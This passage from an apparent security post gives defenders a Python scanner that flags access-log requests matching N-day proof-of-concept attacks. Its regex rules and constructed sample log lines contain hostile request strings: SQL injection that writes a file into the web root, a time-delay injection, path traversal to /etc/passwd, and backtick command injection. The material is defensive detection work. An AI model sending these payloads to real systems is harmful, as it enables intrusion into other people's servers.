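Storing under a random server-chosen name is what removes the "upload then fetch /storage/uploads/tttt.php" step from entries 199 and 202; if the original name must be shown to users, keep it in a database column, not on disk.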
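The post's stated purpose is to let defenders check their own exposure to these Ndays. The scanner below is an added example, not part of the original post: it pulls the request target out of combined-format web access-log records, percent-decodes it, and matches it against patterns derived from the PoC paths and parameters in entries 185 to 203. Where the payload travels in a POST body (most of the SQL injections, the command-execution entries and the uploads), an access log only shows the endpoint, so those rules are tagged "path" and are for triage against application logs, while rules tagged "payload" see the injected content in the URL and are strong indicators. The records in SAMPLE_LOG are constructed for the demonstration, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Request line inside a combined/Apache-style access-log record.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})')

# (entry number in the list above, kind, regex over the decoded request target)
# kind "payload": the injected content is visible in the URL.
# kind "path":    the payload is in the POST body, so only the endpoint is visible.
RULES = [
    ("185", "payload", r"/index\.php\?s=/Admin/appsave.*appid=.*(into\s+outfile|select\s)"),
    ("186", "path",    r"/admin/pr_monitor/getting_index_data\.php"),
    ("187", "path",    r"/index\.cfm/_api/json/v1/default/\?method=processAsyncObject"),
    ("188", "payload", r"/attachment\?file=(/|\.\./)"),
    ("189", "payload", r"/xds/deleteStudy\.php\?documentUniqueId=.*(waitfor|sleep|')"),
    ("190", "path",    r"/index\.php/admin/Userinfo/poihuoqu"),
    ("191", "path",    r"/CDGServer3/.*NavigationAjax"),
    ("192", "payload", r"/JoinfApp/EMail/UploadEmailAttr\?name=.*\.ashx"),
    ("193", "path",    r"/master/ajaxActions/setSystemTimeAction\.php"),
    ("194", "path",    r"/servlet/uploadAttachmentServlet"),
    ("195", "path",    r"/send_order\.cgi\?parameter=operation"),
    ("196", "path",    r"/cas/userCtl/resetPasswordBySuper"),
    ("197", "payload", r"/entsoft/Quotegask_editAction\.entweb.*goonumStr=.*(union|select|')"),
    ("198", "payload", r"/aliyundrive-webdav/query\?sid=.*[`$;|]"),
    ("199", "path",    r"/assetsmanager/upload"),
    ("200", "payload", r"/dmplayer/dmku/\?.*(sleep|select|benchmark)\("),
    ("201", "path",    r"/newsedit/newsplan/task/binary\.do"),
    ("202", "path",    r"/User/AccountEdit\.aspx"),
    ("203", "path",    r"/RedseaPlatform/PtFjk\.mob\?method=upload"),
]
COMPILED = [(entry, kind, re.compile(rx, re.IGNORECASE)) for entry, kind, rx in RULES]


def decode_target(target: str) -> str:
    """Percent-decode twice (the PoCs are single-encoded, scanners often
    double-encode) and turn '+' into spaces so keyword matching sees the
    real payload rather than its encoded form."""
    return unquote_plus(unquote_plus(target))


def scan_line(line: str):
    """Return [(entry, kind), ...] for one access-log record; [] if no match."""
    m = LOG_RE.search(line)
    if not m:
        return []
    target = decode_target(m.group("target"))
    return [(entry, kind) for entry, kind, rx in COMPILED if rx.search(target)]


def scan_log(lines):
    """Return [(line_number, entry, kind), ...] over an iterable of records."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for entry, kind in scan_line(line):
            findings.append((n, entry, kind))
    return findings


# Constructed sample records: encoded PoC URLs from entries 185, 188, 189 and
# 198, a POST to the body-only endpoint of entry 195, a benign request, and a
# legitimate use of the /attachment endpoint that must not fire rule 188.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:10:01:02 +0800] "GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f%27%29+into+outfile+%27.%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/Jun/2024:10:01:05 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1840',
    '10.0.0.6 - - [05/Jun/2024:10:02:11 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 0',
    '10.0.0.7 - - [05/Jun/2024:10:03:00 +0800] "POST /send_order.cgi?parameter=operation HTTP/1.1" 200 77',
    '10.0.0.8 - - [05/Jun/2024:10:03:30 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%60 HTTP/1.1" 200 10',
    '10.0.0.9 - - [05/Jun/2024:10:04:00 +0800] "GET /index.php?s=/Home/index HTTP/1.1" 200 3000',
    '10.0.0.9 - - [05/Jun/2024:10:04:01 +0800] "GET /attachment?file=report.pdf HTTP/1.1" 200 99000',
]

if __name__ == "__main__":
    for n, entry, kind in scan_log(SAMPLE_LOG):
        print(f"line {n}: entry {entry} ({kind})")
```

Run it against a real log with `scan_log(open("access.log"))`. The "path" rules will also match ordinary use of those endpoints, so the follow-up for each hit is to pull the corresponding POST body from the application's own logs or a WAF capture; the "payload" rules match the encoded form exactly as the PoCs send it, which is why the double decode matters.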